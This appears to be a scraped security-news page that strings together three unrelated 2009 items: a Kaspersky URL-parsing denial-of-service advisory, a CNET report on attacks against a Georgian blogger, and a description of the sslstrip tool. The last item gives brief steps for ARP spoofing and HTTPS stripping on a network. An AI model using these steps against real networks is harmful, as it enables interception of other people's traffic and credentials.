Description:
The vulnerability affects Kaspersky Internet Security 2010 9.0.0.459 antivirus and its brother, the Kaspersky Antivirus 2010 9.0.0.463 version.

The exploit was discovered on August 18th 2009.

The problem with these two antivirus versions appears when parsing a URL address. Using a lot of consecutive dots inside the address. Kaspersky’s native avp.exe process will soar CPU usage up to 100%. At first, traffic via the browser will get blocked, and eventually, if enough consecutive dots have been passed inside the URL address, the computer will crash.

This exploit can be used inside HTML files, as normal href values or as img image sources. It will also work inside HTML email bodies. The code can be used remotely, and will lead to a Remote Memory Corruption/Denial-of-Service that could alter computer hardware or software.

Tested on Products:

• Kaspersky Internet Security 2010 9.0.0.459 (EN) with Mozilla FireFox in Windows XP Professional SP2 [en-US]
• Kaspersky Anti-Virus 2010 [En] with IE8 in Windows XP Professional SP2 [en-US]

Proof of Concept: http://www.milw0rm.com/exploits/9537

A Georgian blogger with accounts on Twitter, Facebook, LiveJournal, and Google’s Blogger and YouTube was targeted in a denial-of-service attack that led to the site-wide outage at Twitter and problems at the other sites on Thursday, according to a Facebook executive.

The blogger, who uses the account name “Cyxymu,” (the name of a town in the Republic of Georgia) had accounts on all of the different sites that were attacked at the same time, Max Kelly, chief security officer at Facebook, told CNET News.

“It was a simultaneous attack across a number of properties targeting him to keep his voice from being heard,” Kelly said. “We’re actively investigating the source of the attacks, and we hope to be able to find out the individuals involved in the back end and to take action against them, if we can.”

witter was down for several hours beginning early Thursday morning, and it suffered periodic slowness and time-outs throughout the day.

Cyxymu’s LiveJournal page wasn’t accessible, but a cached version showed that it was updated on Thursday with a message about the denial-of-service, or DoS, attacks on his accounts on the United States-based sites. “Now it’s obvious it’s a special attack against me and Georgians,” said the message, in Russian.

The site also apologized for a spam e-mail attack in which the sender was spoofed and made to look like the e-mails were sent by him. Screenshots are shown. It’s unclear whether or how the spam attack is related to the DoS attacks.

Facebook and Google were able to minimize any impact to their sites, including Blogger, YouTube, and Google Sites, a free Web site service. Facebook even managed to keep the Cyxymu account accessible to Web surfers from that region, Kelly said, though it was inaccessible to people in other geographic areas, including San Francisco.

Source: CNET News

This tool provides a demonstration of the HTTPS stripping attacks.
It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.

To get this running:
* Flip your machine into forwarding mode.
* Setup iptables to redirect HTTP traffic to sslstrip.
* Run sslstrip.
* Run arpspoof to convince a network they should send their traffic to you.

That should do it.

How does this work?
First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).

At this point, sslstrip receives the traffic and does its magic.

Download :
http://www.thoughtcrime.org/software/sslstrip/